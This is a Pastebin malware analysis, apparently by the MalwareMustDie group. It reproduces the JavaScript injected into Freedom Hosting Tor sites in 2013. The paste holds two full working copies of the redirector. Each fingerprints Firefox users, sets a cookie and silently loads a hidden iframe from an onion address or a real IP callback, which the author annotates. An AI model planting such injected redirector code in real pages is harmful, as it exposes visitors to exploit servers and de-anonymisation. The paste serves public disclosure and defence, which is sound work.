daily pastebin goal
11%
SHARE
TWEET

Freedom Hosting FBI IFRAME Redirector Malware Script

MalwareMustDie Aug 12th, 2014 (edited) 1,495 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie!
  2. # This is the malicious Javascript set codes injected to the Freedom Hosting site
  3. # It contents the IFRAMER Malware method to redirect the victim to infector site, in url:
  4. # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
  5. #
  6. # Original copy at: www.twitlonger.com/show/n_1rlo0uu
  7. # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!!
  8. # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER.
  9. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
  10. # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
  11. # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
  12. # Ref: http://www.twitlonger.com/show/n_1rlo0uu
  13. # Ref: http://pastebin.com/bu2Ya0n6
  14. # Ref: http://pastebin.com/pmGEj9bV
  15.  
  16. Additional: Analysis of Magento exploit payload used in infect Tor visitors, lead to the SAME IP:
  17. # Ref: https://pastebin.com/RTwsyrH8
  18. # Ref: https://pastebin.com/aFUP2gLB
  19.  
  20.  
  21. // Case 1
  22.  
  23.     function createCookie(name,value,minutes) {
  24.             if (minutes) {
  25.                     var date = new Date();
  26.                     date.setTime(date.getTime()+(minutes*60*1000));
  27.                     var expires = "; expires="+date.toGMTString();
  28.             }
  29.             else var expires = "";
  30.             document.cookie = name+"="+value+expires+"; path=/";
  31.     }
  32.      
  33.     function readCookie(name) {
  34.         var nameEQ = name + "=";
  35.         var ca = document.cookie.split(';');
  36.         for(var i=0;i < ca.length;i++) {
  37.             var c = ca[i];
  38.             while (c.charAt(0)==' ') c = c.substring(1,c.length);
  39.             if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
  40.         }
  41.         return null;
  42.     }
  43.      
  44.     function isFF() {
  45.         return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  46.     }
  47.      
  48.     function updatify() {
  49.         var iframe = document.createElement('iframe');
  50.         iframe.style.display = "inline";
  51.         iframe.frameBorder = "0";
  52.         iframe.scrolling = "no";
  53.         iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
  54.         iframe.height = "5";
  55.         iframe.width = "*";
  56.         document.body.appendChild(iframe);
  57.     }
  58.      
  59.     function format_quick() {
  60.         if ( ! readCookie("n_serv") ) {
  61.             createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
  62.             updatify();
  63.         }
  64.     }
  65.      
  66.     function isReady()
  67.     {
  68.         if ( document.readyState === "interactive" || document.readyState === "complete" ) {
  69.      
  70.             if ( isFF() ) {
  71.                 format_quick();
  72.             }
  73.         }
  74.         else
  75.         {
  76.             setTimeout(isReady, 250);
  77.         }
  78.     }
  79.     setTimeout(isReady, 250);
  80.  
  81.  
  82. // Case 2
  83.  
  84. function createCookie(name, value, minutes) {
  85.     if (minutes) {
  86.         var date = new Date();
  87.         date.setTime(date.getTime() + (minutes * 60 * 1000));
  88.         var expires = "; expires=" + date.toGMTString();
  89.     } else var expires = "";
  90.     document.cookie = name + "=" + value + expires + "; path=/";
  91. }
  92.  
  93. function readCookie(name) {
  94.     var nameEQ = name + "=";
  95.     var ca = document.cookie.split(';');
  96.     for (var i = 0; i < ca.length; i++) {
  97.         var c = ca[i];
  98.         while (c.charAt(0) == ' ') c = c.substring(1, c.length);
  99.         if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  100.     }
  101.     return null;
  102. }
  103.  
  104. function isFF() {
  105.     return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  106. }
  107.  
  108. function updatify() {
  109.     var iframe = document.createElement('iframe');
  110.     iframe.style.display = "inline";
  111.     iframe.frameBorder = "0";
  112.     iframe.scrolling = "no";
  113.     iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY
  114.     iframe.height = "5";
  115.     iframe.width = "*";
  116.     document.body.appendChild(iframe);
  117. }
  118.  
  119. function freedomhost() {
  120.     if (!readCookie("n_serv")) {
  121.         createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
  122.         updatify();
  123.     }
  124. }
  125.  
  126. function isReady() {
  127.     if (document.readyState === "interactive" || document.readyState === "complete") {
  128.         if (isFF()) {
  129.             //window.alert(window.location + "Firefox Detected.")
  130.             freedomhost();
  131.         }
  132.     } else {
  133.         setTimeout(isReady, 250);
  134.     }
  135. }
  136. setTimeout(isReady, 250);
  137.  
  138. // Noted, same method,
  139. // second script is w/IP info callback, contacting remote host as per marked (1)
  140.  
  141.   IP Address: 65.222.202.53
  142.   City: Triadelphia
  143.   State or Region: West Virginia
  144.   Country: United States
  145.   ISP: Verizon Business
  146.   Latitude & Longitude: 40.0900-80.6220
  147.   Domain: verizonbusiness.com
  148.   ZIP Code: 26059
  149.  
  150. ---
  151. #MalwareMustDie! @unixfreaxjp
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top